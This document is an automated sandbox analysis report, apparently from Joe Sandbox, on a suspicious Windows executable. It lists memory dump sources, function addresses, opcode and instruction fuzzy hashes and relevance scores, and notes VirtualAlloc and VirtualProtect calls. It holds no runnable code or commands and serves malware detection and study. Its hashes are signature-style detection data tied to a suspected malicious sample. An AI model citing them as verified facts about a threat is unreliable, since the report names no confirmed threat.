Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce20f4f7d81339aa8846bd31e6ec7b04bd07c80ce3b036d55d89ad384defccce
Instruction ID: 0f5c687fa6bdea88ba0ec8e1320cbb393845812c89b002e4b0a084aaea08221b
Opcode Fuzzy Hash: ce20f4f7d81339aa8846bd31e6ec7b04bd07c80ce3b036d55d89ad384defccce
Instruction Fuzzy Hash: 12E01270D0D6558EE3A4AB28DC986E877A1FF45342F0013FBD00DB21D3EE7419939A09

Function 00007FF848F62C30 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6664d538d9749f507b5de5dcd0dfd76e1cdf3db562c0b49874290dd5c51ddb3a
Instruction ID: 1d695793385ad4ae3459d99fd5e8c775d31b87eab03018eaf7ef23dcac57a22c
Opcode Fuzzy Hash: 6664d538d9749f507b5de5dcd0dfd76e1cdf3db562c0b49874290dd5c51ddb3a
Instruction Fuzzy Hash: BBE09A71C082288EDB289F64D8917ECB7B0FB54345F0001AED04EA6282DB795685DF45

Function 00007FF8490DCFD7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a9afd5d17703bde797dbe0340c9b139090bff505a90ec81b21a96523bc0945
Instruction ID: d7f00b75247c4068d8761d482595f2786cb0118c9e23d5eb5bc34b3fd3a9c132
Opcode Fuzzy Hash: b8a9afd5d17703bde797dbe0340c9b139090bff505a90ec81b21a96523bc0945
Instruction Fuzzy Hash: 22E01251E0D3C25FFF3A2A7418641792F949F073857591AB6D0498A1D3D94868059711

Function 00007FF8490E23FE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc34e56fadfbafcb2c925d2f1461dfb8f52cffb65a1feae7d5ad1be47a144548
Instruction ID: 114c6bb25beed125a146ac2290da64e7180c1eb8aae63590cd5e4b7b1d1857ac
Opcode Fuzzy Hash: bc34e56fadfbafcb2c925d2f1461dfb8f52cffb65a1feae7d5ad1be47a144548
Instruction Fuzzy Hash: D8D05E92E1E8C69FE968AE6C44223B42186FF89B90F040478E20EC31CBCD1CAC910183

Function 00007FF8490E3D5D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86443170a2e1a358d92d0e202374890d9c266a8580282665a36705b5f11843d
Instruction ID: 1cd601ee7372c5aee136e605e0d13c140616c2d8c6668ca38bbf236161e06d7c
Opcode Fuzzy Hash: f86443170a2e1a358d92d0e202374890d9c266a8580282665a36705b5f11843d
Instruction Fuzzy Hash: B8D05E22D0C2C38FEF3E7E7C5CA51B86FA19F0B384754067AC51E862C2D95CB9089752

Function 00007FF8490E23F1 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac80ac49e99d75ae80578173de1a1ef3c6d5ce87c8912fd4d9d1d26c36c3728f
Instruction ID: 106f9a79ba7cf1984562216726230ea5813b579ae40452b476d5c97e225cab73
Opcode Fuzzy Hash: ac80ac49e99d75ae80578173de1a1ef3c6d5ce87c8912fd4d9d1d26c36c3728f
Instruction Fuzzy Hash: B6D0C93164C8458FDE98EE2CC084D6533E1EB583803254064D00BC76A0DA38E841EB10

Function 00007FF848F675E4 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
Instruction ID: 95685bb8437eca79c1dd0228b960365542510bf5fb37e4420c2eac98ae2c5003
Opcode Fuzzy Hash: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
Instruction Fuzzy Hash: A6C01275D198698EF75AEF1C480477562A1FB64A44F0463A1800CE3185EB315C428B08

Function 00007FF8490DDABB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c213bec842cb2c6d8a257e655bf850255e64b95d87e6100f65e66cae7d157133
Instruction ID: cda4edd791fcb8ca2ef4d4c975bbdd1ff09d3f7cbb47e9f8115d793ec7cbb457
Opcode Fuzzy Hash: c213bec842cb2c6d8a257e655bf850255e64b95d87e6100f65e66cae7d157133
Instruction Fuzzy Hash: 0ED0CA14A0CAC38DFE387E19812023A62AEAF10381F24963ED09F45DC1CD6CF8026302

Function 00007FF8490E484B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 276204985d10570151821e7276ab0221ef123013d92b2cd4ecf4fdaf64782011
Instruction ID: f9ebcbbf97c7bc678f5558f1bb1d8a844df42a7e7f7129fd862139b9b19bd96f
Opcode Fuzzy Hash: 276204985d10570151821e7276ab0221ef123013d92b2cd4ecf4fdaf64782011
Instruction Fuzzy Hash: FBD09215A0D6DB8DFF786E0A82A023E31949F817C0F2A01BEC06F418C1891CF901A609

Function 00007FF848F13A08 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
Instruction ID: 76f3268c14a0b17498a4c0ed87e44403146b43fd8a6c88dd3ec45dc54090dd31
Opcode Fuzzy Hash: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
Instruction Fuzzy Hash: E3E04C70C0D26ACEEB756B1088082B9B564AF11355F1055B9D15D251C1D7795EC58F0A

Function 00007FF8490E485E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5808039ea587d6ecc9993bb7a0da0ac40f59a1cbf8f77f92ba7cc771ab61887
Instruction ID: 531402d43bc6ea186b7f97a807ba061c78a5fe2d85ce682ec62a661c8565006d
Opcode Fuzzy Hash: b5808039ea587d6ecc9993bb7a0da0ac40f59a1cbf8f77f92ba7cc771ab61887
Instruction Fuzzy Hash: 82C08C2080C1C78FFB396B19803523937A09F423C0F2240BAC41E4A8E6CE2CB911D711

Non-executed Functions

Function 00007FF848F77288 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3226d263c99e46c98692f3090050d7aec86cecebbe68fe6ca658f20b5e1fe37a
Instruction ID: 5c63dda762042d28684991e9e7f469017347d7a7522aba65431c0de7fb70ee75
Opcode Fuzzy Hash: 3226d263c99e46c98692f3090050d7aec86cecebbe68fe6ca658f20b5e1fe37a
Instruction Fuzzy Hash: 56818D3091CA8D8FEBA8EF28C8457F977E1FB59350F10412AE84DC7292DB74A944CB85

Function 00007FF848F21DCE Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d5e051c975076e0f1a600bd9f77c445dd7377726e473929d0df6e0291513ad
Instruction ID: 61414a7b2d9335615880266d469f9bf6a8cbedb8071df6234f89f57dcfc93301
Opcode Fuzzy Hash: f5d5e051c975076e0f1a600bd9f77c445dd7377726e473929d0df6e0291513ad
Instruction Fuzzy Hash: DB81D93090CA8D8FEBA8EF68D8457E97BE0FF59350F00412AE84DC7291DB75A485CB85

Function 00007FF848F7794D Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c339205cd82e2b234e3cd66b8b4be55004a946f6697663cf37d7bde9364143
Instruction ID: b9cb1a3500aa754dc9baca707c6b09af8f158e70f3c81c1654d0d1354576a5ce
Opcode Fuzzy Hash: f8c339205cd82e2b234e3cd66b8b4be55004a946f6697663cf37d7bde9364143
Instruction Fuzzy Hash: 1671AD30918A8D8FEBA8EF18D845BF977E1FF59350F10412AE84DC7291DB74A984CB85

Function 00007FF848F772C8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b8742bbfa9f63b0fbfe62ab69611c4603f32148c1a4a56fa5d2cf8267ba111
Instruction ID: 774c5c9f9791e92b1380d67d36f8e7ef1fcd1a803b8c23c977cee9740dfdf143
Opcode Fuzzy Hash: b9b8742bbfa9f63b0fbfe62ab69611c4603f32148c1a4a56fa5d2cf8267ba111
Instruction Fuzzy Hash: 11719170918A8D8FEBA8EF18C845BF977E1FF59350F10412AE80DC7291DB74A984CB85

Analysis Process: hBoBqOIwjXsCbkOMEKwZ.exePID: 3720, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F2B6BD Relevance: 4.6, Strings: 2, Instructions: 2108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

NM_H, xrefs: 00007FF848F2D671
lM_H, xrefs: 00007FF848F2B874

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: NM_H$lM_H
API String ID: 0-209739149
Opcode ID: 2fca934d00e9d02cb2cef69e964ba5208c5296f946a68d54432061534d4f98d2
Instruction ID: 6181978d8cd5d2dec3264fb7fbc490e77ba61c9d14fa9345894578282e7eaf39
Opcode Fuzzy Hash: 2fca934d00e9d02cb2cef69e964ba5208c5296f946a68d54432061534d4f98d2
Instruction Fuzzy Hash: FF03C970D0992D8FDB98EB18D895BA9B7B1FF58341F1042E9D00DE3296DB35AA81CF44

Function 00007FF848F10DAC Relevance: .3, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad8caf0ad389e76f92c06c758fb0180b1e2966f56a9e6cb34681cba6299ead4
Instruction ID: 5d0280f985bf65584b366936026ce231369d32c5b2ff0aa687699c1267b62be6
Opcode Fuzzy Hash: fad8caf0ad389e76f92c06c758fb0180b1e2966f56a9e6cb34681cba6299ead4
Instruction Fuzzy Hash: 24A1B971919A9A9FE798EB2CC8693AA7FE1FB99354F00017AC008D72D2DF781851C750

Function 00007FF848F19DC1 Relevance: 2.5, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 00007FF848F19DF2
X, xrefs: 00007FF848F14E70

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: .$X
API String ID: 0-1506445976
Opcode ID: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
Instruction ID: d9ddb999048f3af8c650fce20fb5c9e20bfaaaf14ded0af2f72f55149dafc962
Opcode Fuzzy Hash: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
Instruction Fuzzy Hash: 2C11C5709482298FEB64EB14C8987ECB3B1FB94351F5052E9D50DA62C2CB785EC9CF48

Function 00007FF848F23731 Relevance: 1.8, APIs: 1, Instructions: 516
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FF848F23B8F

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 872f4ae6a23658a5ff713dfc8d02f02050060f74a0dd811337ee3560c3804aca
Instruction ID: 930bb05a1dcab7fa665f57d66fdedd8482c5f84ec2534218bcf25766372b7ee7
Opcode Fuzzy Hash: 872f4ae6a23658a5ff713dfc8d02f02050060f74a0dd811337ee3560c3804aca
Instruction Fuzzy Hash: 8402A07080D68D8FDB95EF68D855AE9BFF0FF59300F0401AAE448D72A2DB35A985CB41

Function 00007FF848F236F0 Relevance: 1.8, APIs: 1, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebfe3de5d49c07a89893bdbb2034e2805744e0c0dd63046d405a95f2df642e93
Instruction ID: be5405f8c64e7a8128b58912e594f5f275b9adfa2c24fa166d4e455161a5f4eb
Opcode Fuzzy Hash: ebfe3de5d49c07a89893bdbb2034e2805744e0c0dd63046d405a95f2df642e93
Instruction Fuzzy Hash: 1A02AF7080D68D8FDB95EF68D8556E9BFF0FF59300F0401AAD448D72A2DB35A985CB81

Function 00007FF848F2207E Relevance: 1.7, APIs: 1, Instructions: 192
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF848F221BA

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: af46da1f7898ef12c3b7a0cf3a19e0215576f223df72b38fa9922d7b69d759a6
Instruction ID: 57666cd17b33c523ef0675bb78722952a9454145d75f0f9bbcc12ff16c6fc12e
Opcode Fuzzy Hash: af46da1f7898ef12c3b7a0cf3a19e0215576f223df72b38fa9922d7b69d759a6
Instruction Fuzzy Hash: 1C518D30D0864D8FEB54DFA8D885AEDBBF1FB66310F10426AD449E3252DB75A885CB81

Function 00007FF848F5D67D Relevance: 1.7, Strings: 1, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MJ_H, xrefs: 00007FF848F5D774

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: MJ_H
API String ID: 0-1880350675
Opcode ID: 717460a6e5c5f4ec2f92ef510797835fda4400f8beaf5fa5a826fff8e6ac2dd7
Instruction ID: ec09e3c5050cce66e0ac886f3a10a4374f920bbc974b0f926f93a3b40fc6253d
Opcode Fuzzy Hash: 717460a6e5c5f4ec2f92ef510797835fda4400f8beaf5fa5a826fff8e6ac2dd7
Instruction Fuzzy Hash: C7F14771D1AA5A9FDB98EB68C8657E8B7B1FF59340F4441B9D00DE32C2CB386884CB45

Function 00007FF848F5BEF6 Relevance: 1.5, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FF848F5C298

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3297c4a3edcfa41390dc8df383a44300dd38723195d819d4ec823e5f397e33bd
Instruction ID: 6b8f21867bc98df8f03d219a66172e1de10c0ba6a3d9c768253d71902d13ff2f
Opcode Fuzzy Hash: 3297c4a3edcfa41390dc8df383a44300dd38723195d819d4ec823e5f397e33bd
Instruction Fuzzy Hash: D1810770D1C619CFEBA8EB58C8557A8B7F1FB59340F1041BAC04EE3282DB7869858F55

Function 00007FF848F267A7 Relevance: 1.3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 00007FF848F26836

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f26000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 1fd53b3bfe38969774012ba39deef8edaf799bb5ec37be08d5ebbc9c1d744a8e
Instruction ID: 3e96e11d2842d56d328d0a6feb4f219c00f5d660997e858fae1a7f62fc933f88
Opcode Fuzzy Hash: 1fd53b3bfe38969774012ba39deef8edaf799bb5ec37be08d5ebbc9c1d744a8e
Instruction Fuzzy Hash: 8521B7749085698EEBA4EF08D854BACB7F1FF58350F1085EAD00DE2291DB796A85CF14

Function 00007FF848F27C39 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f26000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040cd5dbf310b08801bfeb30c8ae22094e96576443abad48d0ee9c69b9153486
Instruction ID: dfe7cf6a65fbebf3fd225a6ed7ea18fa0e5cb8a03aa5784627ceac5b57ad5bcc
Opcode Fuzzy Hash: 040cd5dbf310b08801bfeb30c8ae22094e96576443abad48d0ee9c69b9153486
Instruction Fuzzy Hash: 98514D3180DA8D8FDB96EF2888596A97FF0FF16340F4501EAE808C71A2D735E994CB41

Function 00007FF848F63D8E Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5614830aa9c233ccfc9b3429f3373fb71dcb0b81e3a66048519f4a96eb9021
Instruction ID: a218bf43814bbc06a520d4b36d7900dadfc16a799da3bca1b5212329345b3fda
Opcode Fuzzy Hash: 8e5614830aa9c233ccfc9b3429f3373fb71dcb0b81e3a66048519f4a96eb9021
Instruction Fuzzy Hash: 3F51A470D19A1D8FDB94EF98C885BADB7F1FF58310F20826AD40CE3295DB3469868B54

Function 00007FF848F17C82 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e8944bcd6f18f52b330ee435ca44875b24f8ce92bbc87b5dc5e460418bbe545
Instruction ID: 0c106c2aecb9136b76fde987a93ab4234f36e0869516a7a7556e3d280dd50ebf
Opcode Fuzzy Hash: 1e8944bcd6f18f52b330ee435ca44875b24f8ce92bbc87b5dc5e460418bbe545
Instruction Fuzzy Hash: 5F51AB70D1892D8FDBA4EF14C854AE9B7B1FBA4341F1001EAD00DE3295DB36AE908F44

Function 00007FF848F27B45 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f26000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ba7711df204a10d6d1dd6ba2d8884449818e56de419ca0b2f7dcfdae016111
Instruction ID: 10a99d0289b308c0b931c3bfa7879080056bcda07e45cc72e69acf1cbda23a99
Opcode Fuzzy Hash: 97ba7711df204a10d6d1dd6ba2d8884449818e56de419ca0b2f7dcfdae016111
Instruction Fuzzy Hash: F7317E3185E6CC9FDB45EF6898596E97FB0FF15300F4404ABE804C6092EB389658C702

Function 00007FF848F17D7A Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f23a6e4cba66350658b15bae4f3c60844de893b022c7d5e63922ff90dfdaf1
Instruction ID: 04e1ac2e40c98e8d63cfff7f052ec527111fc3903922935c3db57bac3c824911
Opcode Fuzzy Hash: 22f23a6e4cba66350658b15bae4f3c60844de893b022c7d5e63922ff90dfdaf1
Instruction Fuzzy Hash: A3316C7194991C8FDFA8DF14C855AE977B1FBA4341F1001EAD00EE3694DB769A94CF40

Function 00007FF848F10C25 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd56706d9e47707605b71db4aa07bbf495eeb879f2d19f84bab14d2eb1af577
Instruction ID: c3e37431df6bb2a4ae56ebbf50fc1baf2b8927c0e9d82a21fd767ad224298dbc
Opcode Fuzzy Hash: 7cd56706d9e47707605b71db4aa07bbf495eeb879f2d19f84bab14d2eb1af577
Instruction Fuzzy Hash: B1215B36A0C69E8FE702B768D8012ED7760EFC2361F044573C945DB1D1DB381909CB95

Function 00007FF848F67E90 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be2ccfa229381d91bc0dc5c9d5781074833af98bb258da09f047f568b783d694
Instruction ID: f4f89147bb22f6d7a92ad919584506a881940cc21d2024bcd9d4ec4ec355972f
Opcode Fuzzy Hash: be2ccfa229381d91bc0dc5c9d5781074833af98bb258da09f047f568b783d694
Instruction Fuzzy Hash: AC21F631C1D9599FE744FF18E4865EA3BA0FF10365F0402B6D00CC6183DF29A445C794

Function 00007FF848F111A2 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c1631b727eada07cccafedf9c84fb6fe6b6870f13df69f94a744ae6a8f35f8
Instruction ID: 3097d9ebafcb41d4e2b3430172cb805fef743de4226b3fc6564ed8b0c388d423
Opcode Fuzzy Hash: a6c1631b727eada07cccafedf9c84fb6fe6b6870f13df69f94a744ae6a8f35f8
Instruction Fuzzy Hash: 9C21EB30A1891E8FEB84FB68D8949ADB7F1FF58350F10057AD419E3295DB34A981CB44

Function 00007FF848F15A33 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b040f0c369344548c63f0c03e35f682fed4bdeedc1daa89e892469cc444766
Instruction ID: 7ced98ec52aa2bd5a76ec808147b43954d080ef9fe1f2d513251f956186fbc01
Opcode Fuzzy Hash: c7b040f0c369344548c63f0c03e35f682fed4bdeedc1daa89e892469cc444766
